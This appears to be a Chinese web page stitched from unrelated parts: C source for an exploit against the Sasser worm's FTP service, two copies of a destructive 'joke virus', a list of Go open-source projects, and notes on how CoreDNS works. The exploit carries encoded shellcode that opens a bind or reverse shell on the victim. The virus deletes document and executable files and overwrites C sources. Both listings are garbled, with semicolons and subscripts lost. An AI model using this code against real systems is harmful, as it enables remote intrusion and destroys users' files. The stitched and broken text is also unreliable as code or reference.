以下附震荡波(Sasser)病毒相关的C语言源码(从代码中的BANNER字符串看,这段代码是针对 sasser.x 的漏洞利用程序,而不是蠕虫本体;清单在转载过程中丢失了分号和数组下标,无法直接编译)
#i nclude <stdio.h>
#i nclude <strings.h>
#i nclude <signal.h>
#i nclude <netinet/in.h>
#i nclude <netdb.h>
// Escape-sequence strings spliced into BANNER below.
#define NORM "\033[0000m"
#define GREEN "\033[0132m"
#define YELL "\033[0133m"
#define RED "\033[0131m"
// Start-up banner; the text identifies the program as "mandragore's sploit v1.3" for "sasser.x".
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM
// Print the errno text for x, then terminate with status 1.
// NOTE(review): statement terminators are missing here and throughout this listing,
// so the code does not compile as shown.
#define fatal(x) { perror(x)exit(1)}
// Default TCP port the tool connects to (overridable with -p, see usage()).
// The Sasser worm's built-in FTP service listened on 5554/tcp, so unexpected
// traffic to that port is worth alerting on.
#define default_port 5554
// Per-platform table selected with -t. Per the column comment below, each row holds
// an OS label plus three hard-coded absolute addresses (a "go ebx or pop pop ret"
// address, a GetProcAddress pointer and a LoadLibrary pointer).
// NOTE(review): fixed addresses like these only hold where module load addresses do
// not change between hosts; address-space randomisation invalidates that assumption.
struct { char *oslong goreglong gpalong lla}
targets[] = {
// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },
{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },
{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },
}, tsz
// Opaque payload bytes used when bindopt is set (the default, "-s bind").
// setoff() overwrites 4 bytes at offsets 0x1d and 0x2e, and the -P handler in main()
// overwrites 2 bytes at offset 0x57; each value is XORed with a 0xde pattern before
// it is written. The unpatched bytes are constant and can serve as a content signature.
unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
0xC8,0x21,0x0E
}
// Opaque payload bytes used when bindopt is cleared ("-s rev").
// setoff() overwrites 4 bytes at offsets 0x1d and 0x2e; main() overwrites 2 bytes at
// offset 0x5a (the -P value) and 4 bytes at offset 0x53 (the address resolved from -H).
// Each value is XORed with a 0xde pattern before it is written. The unpatched bytes
// are constant and can serve as a content signature.
unsigned char rsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
}
// Verbosity counter, incremented by -v; main() only uses it to print "verbose!".
char verbose=0
/*
 * Write the two per-target pointers into both payload arrays.
 *
 * GPA and LLA are each XORed with 0xdededede, and the low 4 bytes of each result
 * are copied to offset 0x1d (GPA) and offset 0x2e (LLA) of bsh and of rsh.
 * main() calls this with the gpa/lla fields of the selected targets[] row.
 */
void setoff(long GPA, long LLA) {
int gpa=GPA^0xdededede, lla=LLA^0xdededede
memcpy(bsh+0x1d,&gpa,4)
memcpy(bsh+0x2e,&lla,4)
memcpy(rsh+0x1d,&gpa,4)
memcpy(rsh+0x2e,&lla,4)
}
/*
 * Print the command-line help and the list of target types, then exit with status 1.
 *
 * argv0 is the program name shown in the first help line. This function never returns.
 * NOTE(review): the help text gives 530 as the default for -P, while main()
 * initialises Port to 5300.
 */
void usage(char *argv0) {
int i
printf("%s -d <host/ip>[opts]\n\n",argv0)
printf("Options:\n")
printf(" -h undocumented\n")
printf(" -p <port>to connect to [default: %u]\n",default_port)
printf(" -s <'bind'/'rev'>shellcode type [default: bind]\n")
printf(" -P <port>for the shellcode [default: 530]\n")
printf(" -H <host/ip>for the reverse shellcode\n")
printf(" -L setup the listener for the reverse shell\n")
printf(" -t <target type>[default 0]choose below\n\n")
printf("Types:\n")
// One line per targets[] row: index, OS label and the goreg address.
for(i = 0i <sizeof(targets)/sizeof(tsz)i++)
printf(" %d %s\t[0x%.8x]\n", i, targets.os, targets.goreg)
exit(1)
}
/*
 * Relay bytes between the local terminal and the connected socket s.
 *
 * Loops on select() over descriptor 0 and s. Data read locally is sent to s;
 * data received from s is written to descriptor 1. Any select/read/recv failure
 * or end-of-stream (< 1 byte) ends the process through fatal().
 */
void shell(int s) {
char buff[4096]
int retval
fd_set fds
printf("[+] connected!\n\n")
for () {
FD_ZERO(&fds)
FD_SET(0,&fds)
FD_SET(s,&fds)
if (select(s+1, &fds, NULL, NULL, NULL) <0)
fatal("[-] shell.select()")
// Local side: select() watched descriptor 0, but the read below is issued on descriptor 1.
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) <1)
fatal("[-] shell.recv(stdin)")
send(s,buff,retval,0)
}
// Remote side: echo whatever the peer sent to descriptor 1.
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) <1)
fatal("[-] shell.recv(socket)")
write(1,buff,retval)
}
}
}
/*
 * Listener used with -L: accept one inbound TCP connection on `port` and hand it to shell().
 *
 * The socket is bound with s_addr = 0, i.e. on every local interface. If bind() fails,
 * the parent process is sent SIGKILL before this process exits through fatal().
 * Called from the forked child in main().
 */
void callback(short port) {
struct sockaddr_in sin
int s,slen=16
// Numeric constants instead of names: family 2, and socket(2,1,6) below
// (presumably AF_INET / SOCK_STREAM / IPPROTO_TCP; confirm against the platform headers).
sin.sin_family = 2
sin.sin_addr.s_addr = 0
sin.sin_port = htons(port)
s=socket(2,1,6)
if ( bind(s,(struct sockaddr *)&sin, 16) ) {
kill(getppid(),SIGKILL)
fatal("[-] shell.bind")
}
listen(s,1)
// The listening descriptor is overwritten by the accepted one and never closed.
s=accept(s,(struct sockaddr *)&sin,&slen)
shell(s)
printf("crap\n")
}
/*
 * Entry point: parse options, connect to the chosen host/port, log in with a
 * USER/PASS exchange, send one oversized PORT command carrying a payload array,
 * then (bind mode) connect to the payload's port and relay it through shell().
 *
 * NOTE(review): this listing has lost statement terminators, array subscripts and
 * at least one initializer in extraction; it does not compile as shown.
 */
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin
struct hostent *he
char *hostint port=default_port
char *Hostint Port=5300char bindopt=1
int i,s,pid=0,rip
char *buff
int type=0
char *jmp[]=
printf(BANNER "\n")
if (argc==1)
usage(argv[0])
// Options are consumed in flag/value pairs (i advances by 2); flags without a
// value (-L, -v) step i back by one.
for (i=1i<argci+=2) {
if (strlen(argv) != 2)
usage(argv[0])
switch(argv[1]) {
case 't':
type=atoi(argv[i+1])
break
case 'd':
host=argv[i+1]
break
case 'p':
port=atoi(argv[i+1])?:default_port
break
case 's':
if (strstr(argv[i+1],"rev"))
bindopt=0
break
case 'H':
Host=argv[i+1]
break
case 'P':
// The port is XORed with 0xdede and byte-swapped, written into both payload
// arrays, then the same two operations are applied again so that Port holds
// the plain value for the messages and connect() calls below.
Port=atoi(argv[i+1])?:5300
Port=Port ^ 0xdede
Port=(Port &0xff) <<8 | Port >>8
memcpy(bsh+0x57,&Port,2)
memcpy(rsh+0x5a,&Port,2)
Port=Port ^ 0xdede
Port=(Port &0xff) <<8 | Port >>8
break
case 'L':
pid++i--
break
case 'v':
verbose++i--
break
case 'h':
usage(argv[0])
default:
usage(argv[0])
}
}
if (verbose)
printf("verbose!\n")
// Resolve the -d host; only the first returned address is used.
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()")
sin.sin_family = 2
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0])
sin.sin_port = htons(port)
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port)
if (bindopt)
printf("[.] will try to put a bindshell on port %d.\n",Port)
else {
// Reverse mode: the -H address is XORed with 0xdededede and written into rsh at 0x53.
if ((he=gethostbyname(Host))==NULL)
fatal("[-] gethostbyname() for -H")
rip=*((long *)he->h_addr_list[0])
rip=rip^0xdededede
memcpy(rsh+0x53,&rip,4)
if (pid) {
// -L was given: fork a child that runs the listener in callback().
printf("[.] setting up a listener on port %d.\n",Port)
pid=fork()
switch (pid) { case 0: callback(Port)}
} else
printf("[.] you should h***e a listener on %s:%d.\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port)
}
// type comes straight from atoi() and is used as an index without a range check.
printf("[.] using type '%s'\n",targets[type].os)
// -------------------- core
s=socket(2,1,6)
if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL)
fatal("[-] connect()")
}
printf("[+] connected, sending exploit\n")
buff=(char *)malloc(4096)
bzero(buff,4096)
// Wire pattern produced below: "USER x", "PASS x", then a single "PORT " line
// padded with 0x90 bytes to roughly 2000 bytes. A PORT argument of that length
// does not occur in legitimate FTP traffic and is a practical network signature.
// Replies are read but never inspected.
sprintf(buff,"USER x\n")
send(s,buff,strlen(buff),0)
recv(s,buff,4095,0)
sprintf(buff,"PASS x\n")
send(s,buff,strlen(buff),0)
recv(s,buff,4095,0)
memset(buff+0000,0x90,2000)
strncpy(buff,"PORT ",5)
strcat(buff,"\x0a")
// Fixed-offset writes into the padded command: jmp[] entries, the selected row's
// goreg address, and (at offset 300) one of the two payload arrays.
memcpy(buff+272,jmp[0],2)
memcpy(buff+276,&targets[type].goreg,4)
memcpy(buff+280,jmp[1],5)
setoff(targets[type].gpa, targets[type].lla)
if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh))
else
memcpy(buff+300,&rsh,strlen(rsh))
send(s,buff,strlen(buff),0)
free(buff)
close(s)
// -------------------- end of core
if (bindopt) {
// Bind mode: wait one second, then connect to the same host on Port and relay it.
sin.sin_port = htons(Port)
sleep(1)
s=socket(2,1,6)
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed")
shell(s)
}
// Reap the listener child, if one was forked.
if (pid) wait(&pid)
exit(0)
}
*/
NO 1
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Copy infile over outfile one character at a time; outfile is truncated first.
 *
 * Neither fopen() result is checked. Because feof() only becomes true after a read
 * has already failed, the loop also writes the EOF return value of the final
 * fgetc() as one extra byte.
 */
void copyfile(char *infile, char *outfile)
{
FILE *in,*out
in = fopen(infile,"r")
out = fopen(outfile,"w")
while (!feof(in))
{
fputc(fgetc(in),out)
}
fclose(in)
fclose(out)
}
/*
 * Litter the disk with empty files: five mktemp()-named files in the current
 * directory, then five more after changing to "<drive>:\" where the drive letter
 * is picked from disk[] by getdisk().
 *
 * NOTE(review): strcat() appends to a string literal here, and the fopen() results
 * are passed to fclose() unchecked.
 */
void MakeRubbish()
{
int i
FILE *fp
char *path
char *NewName
char *disk[7] = {"A","B","C","D","E","F","G"}
char *addtion = ":\\"
// First batch: current working directory.
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
// Second batch: root of the current drive.
path = strcat(disk[getdisk()],addtion)
chdir(path)
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
}
/*
 * Create two files at hard-coded Windows paths and fill each with a copy of C_KILLER.C.
 *
 * What is copied is the C source text, not a compiled program, despite the .exe/.com
 * names. The two fixed paths are usable as file-system indicators:
 *   C:\WINDOWS\system32\loveworm.exe
 *   C:\WINDOWS\virusssss.com
 * The open() flag values 0x0100 and 0x0080 are presumably O_CREAT and S_IWRITE;
 * confirm against the compiler's headers. The descriptor returned by open() is discarded.
 */
void CreatEXE()
{
int i
char *path
char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"}
for ( i = 0i <2i++)
{
open(s, 0x0100,0x0080)
copyfile( "C_KILLER.C",s)
}
}
/*
 * Delete files in the current directory that match *.txt, *.doc or *.exe.
 *
 * Matches are enumerated with findfirst()/findnext() and each ff_name is passed to
 * remove(). The attribute argument 2 is presumably FA_HIDDEN; confirm against dir.h.
 * Only the current directory is searched; there is no recursion in this function.
 */
void Remove()
{
int done
int i
struct ffblk ffblk
char *documenttype[3] = {"*.txt","*.doc","*.exe"}
for (i = 0i <3i++)
{
done = findfirst(documenttype,&ffblk,2)
while (!done)
{
remove(ffblk.ff_name)
done = findnext(&ffblk)
}
}
}
/*
 * Overwrite every *.c file in the current directory with the contents of C_KILLER.C.
 *
 * The file named exactly "C_KILLER.C" is skipped so the source of the copy survives;
 * the comparison is case-sensitive (strcmp). The original contents of the other
 * files are lost because copyfile() opens its destination with "w".
 */
void Breed()
{
int done
struct ffblk ffblk
done = findfirst("*.c",&ffblk,2)
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
{
copyfile("C_KILLER.C",ffblk.ff_name)
}
done = findnext(&ffblk)
}
}
/*
 * Program entry: runs the destructive steps first and only afterwards claims to be a joke.
 *
 * Order of effects: Breed() overwrites *.c files, Remove() deletes *.txt/*.doc/*.exe,
 * CreatEXE() drops two files under C:\WINDOWS, MakeRubbish() creates empty files;
 * then the program waits for a key, clears the screen and starts "cmd" via system().
 * The "ONLY A JOKE" message is printed after the files have already been changed.
 */
void main()
{
printf("THERE IS A VIRUS BY XIAOKE.\n\n")
Breed()
Remove()
CreatEXE()
printf("COULD YOU TELL ME YOUR NAME?\n\n")
printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n")
MakeRubbish()
getchar()
printf("IT'S ONLY A JOKE! THANK YOU!\n\n")
clrscr()
system("cmd")
}
NO 2
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Copy infile over outfile one character at a time; outfile is truncated first.
 *
 * Neither fopen() result is checked. Because feof() only becomes true after a read
 * has already failed, the loop also writes the EOF return value of the final
 * fgetc() as one extra byte.
 */
void copyfile(char *infile, char *outfile)
{
FILE *in,*out
in = fopen(infile,"r")
out = fopen(outfile,"w")
while (!feof(in))
{
fputc(fgetc(in),out)
}
fclose(in)
fclose(out)
}
/*
 * Litter the disk with empty files: five mktemp()-named files in the current
 * directory, then five more after changing to "<drive>:\" where the drive letter
 * is picked from disk[] by getdisk().
 *
 * NOTE(review): strcat() appends to a string literal here, and the fopen() results
 * are passed to fclose() unchecked.
 */
void MakeRubbish()
{
int i
FILE *fp
char *path
char *NewName
char *disk[7] = {"A","B","C","D","E","F","G"}
char *addtion = ":\\"
// First batch: current working directory.
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
// Second batch: root of the current drive.
path = strcat(disk[getdisk()],addtion)
chdir(path)
for (i = 0i<5i++)
{
char tempname[] = "XXXXXX"
NewName = mktemp(tempname)
fp = fopen(NewName,"w")
fclose(fp)
}
}
/*
 * Create two files at hard-coded Windows paths and fill each with a copy of C_KILLER.C.
 *
 * What is copied is the C source text, not a compiled program, despite the .exe/.com
 * names. The two fixed paths are usable as file-system indicators:
 *   C:\WINDOWS\system32\loveworm.exe
 *   C:\WINDOWS\virusssss.com
 * The open() flag values 0x0100 and 0x0080 are presumably O_CREAT and S_IWRITE;
 * confirm against the compiler's headers. The descriptor returned by open() is discarded.
 */
void CreatEXE()
{
int i
char *path
char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"}
for ( i = 0i <2i++)
{
open(s, 0x0100,0x0080)
copyfile( "C_KILLER.C",s)
}
}
/*
 * Delete files in the current directory that match *.txt, *.doc or *.exe.
 *
 * Matches are enumerated with findfirst()/findnext() and each ff_name is passed to
 * remove(). The attribute argument 2 is presumably FA_HIDDEN; confirm against dir.h.
 * Only the current directory is searched; there is no recursion in this function.
 */
void Remove()
{
int done
int i
struct ffblk ffblk
char *documenttype[3] = {"*.txt","*.doc","*.exe"}
for (i = 0i <3i++)
{
done = findfirst(documenttype,&ffblk,2)
while (!done)
{
remove(ffblk.ff_name)
done = findnext(&ffblk)
}
}
}
/*
 * Overwrite every *.c file in the current directory with the contents of C_KILLER.C.
 *
 * The file named exactly "C_KILLER.C" is skipped so the source of the copy survives;
 * the comparison is case-sensitive (strcmp). The original contents of the other
 * files are lost because copyfile() opens its destination with "w".
 */
void Breed()
{
int done
struct ffblk ffblk
done = findfirst("*.c",&ffblk,2)
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
{
copyfile("C_KILLER.C",ffblk.ff_name)
}
done = findnext(&ffblk)
}
}
/*
 * Program entry: runs the destructive steps first and only afterwards claims to be a joke.
 *
 * Order of effects: Breed() overwrites *.c files, Remove() deletes *.txt/*.doc/*.exe,
 * CreatEXE() drops two files under C:\WINDOWS, MakeRubbish() creates empty files;
 * then the program waits for a key, clears the screen and starts "cmd" via system().
 * The "ONLY A JOKE" message is printed after the files have already been changed.
 */
void main()
{
printf("THERE IS A VIRUS BY XIAOKE.\n\n")
Breed()
Remove()
CreatEXE()
printf("COULD YOU TELL ME YOUR NAME?\n\n")
printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n")
MakeRubbish()
getchar()
printf("IT'S ONLY A JOKE! THANK YOU!\n\n")
clrscr()
system("cmd")
}
1.Docker项目网址为 https://github.com/docker/docker 。
介绍:Docker是一种操作系统层面的虚拟化技术,可以在操作系统和应用程序之间进行隔离,也可以称之为容器。Docker可以在一台物理服务器上快速运行一个或多个实例。例如,启动一个CentOS操作系统,并在其内部命令行执行指令后结束,整个过程就像直接在本机操作系统中执行一样高效。
2.golang项目
网址为 https://github.com/golang/go 。
介绍:Go语言的早期源码使用C语言和汇编语言写成。从Go 1.5版本自举后,完全使用Go语言自身进行编写。Go语言的源码对了解Go语言的底层调度有极大的参考意义,建议希望对Go语言有深入了解的读者读一读。
3.Kubernetes项目
网址为 https://github.com/kubernetes/kubernetes 。
介绍:Google公司开发的构建于Docker之上的容器调度服务,用户可以通过Kubernetes集群进行云端容器集群管理。
4.etcd项目
网址为 https://github.com/coreos/etcd 。
介绍:一款分布式、可靠的KV存储系统,可以快速进行云配置。
5.beego项目
网址为 https://github.com/astaxie/beego 。
介绍:beego是一个类似Python的Tornado的框架,采用了RESTful的设计思路,是使用Go语言编写的一个极轻量级、高可伸缩性和高性能的Web应用框架。
6.martini项目
网址为 https://github.com/go-martini/martini 。
介绍:一款快速构建模块化的Web应用的Web框架。
7.codis项目
网址为 https://github.com/CodisLabs/codis 。
介绍:国产的优秀分布式Redis解决方案。
8.delve项目
网址为 https://github.com/derekparker/delve 。
介绍:Go语言强大的调试器,被很多集成环境和编辑器整合。
CoreDNS是使用Go语言编写的快速灵活的DNS服务,采用链式插件模式,每个插件实现独立的功能,底层协议可以是tcp/udp,也可以是TLS、gRPC等。默认监听所有IP地址;如果不希望在所有网络接口上提供服务,可使用bind插件限定监听地址。
格式如下
SCHEME是可选的,默认值为dns://,也可以指定为tls://,grpc://或者https://。
ZONE是可选的,指定了此dnsserver可以服务的域名前缀,如果不指定,则默认为root,表示可以接收所有的dns请求。
PORT是可选的,指定了监听端口号,默认为53,如果这里指定了端口号,则不能通过参数-dns.port覆盖。
一块上面格式的配置表示一个dnsserver,称为serverblock,可以配置多个serverblock表示多个dnsserver。
下面通过一个例子说明,如下配置文件指定了4个serverblock,即4个dnsserver,第一个监听端口5300,后面三个监听同一个端口53,每个dnsserver指定了特定的插件。
下图为配置的简略图
a. 从图中可看到插件执行顺序不是配置文件中的顺序,这是因为插件执行顺序是在源码目录中的plugin.cfg指定的,一旦编译后,顺序就固定了。
b. .根serverblock虽然指定了health,但是图中却没有,这是因为health插件不参与dns请求的处理。能处理dns请求的插件必须提供如下两个接口函数。
dns请求处理流程
收到dns请求后,首先根据域名匹配zone找到对应的dnsserver(最长匹配优先),如果没有匹配到,则使用默认的root dnsserver。
找到dnsserver后,就要按照插件顺序执行其中配置的插件,当然并不是配置的插件都会被执行,如果某个插件成功找到记录,则返回成功,否则根据插件是否配置了fallthrough等来决定是否执行下一个插件。
plugin.cfg
源码目录下的plugin.cfg指定了插件执行顺序,如果想添加插件,可按格式添加到指定位置。
源码目录下的Makefile根据plugin.cfg生成了两个go文件:zplugin.go和zdirectives.go。
core/dnsserver/zdirectives.go将所有插件名字放在一个数组中。
coredns 主函数
coredns.go 首先导入了包"github.com/coredns/coredns/core/plugin",此包内只有一个文件zplugin.go,此文件为自动生成的,主要导入了所有的插件,执行每个插件的init函数。
接着执行 run.go Run
此文件又引入了包"github.com/coredns/coredns/core/dnsserver",其init函数在 dnsserver/register.go 文件中,如下所示,主要是注册了serverType
剩下的就是解析参数,解析配置文件后,执行caddy.Start。
这里就是根据配置文件中指定的serverblock,执行插件的setup进行初始化,创建对应的server,开始监听dns请求
tcp协议调用Serve,udp协议调用ServePacket
收到DNS请求后,调用ServeDNS,根据域名匹配dnsserver,如果匹配不到则使用根dnsserver,然后执行dnsserver中配置的插件
以k8s插件为例
参考
//如何写coredns插件
http://dockone.io/article/9620
//coredns源码分析
https://wenku.baidu.com/view/34cabc1e346baf1ffc4ffe4733687e21af45ff7c.html
https://blog.csdn.net/zhonglinzhang/article/details/99679323
https://www.codercto.com/a/89703.html
//NodeLocal DNSCache
https://www.cnblogs.com/sanduzxcvbnm/p/16013560.html
https://blog.csdn.net/xixihahalelehehe/article/details/118894971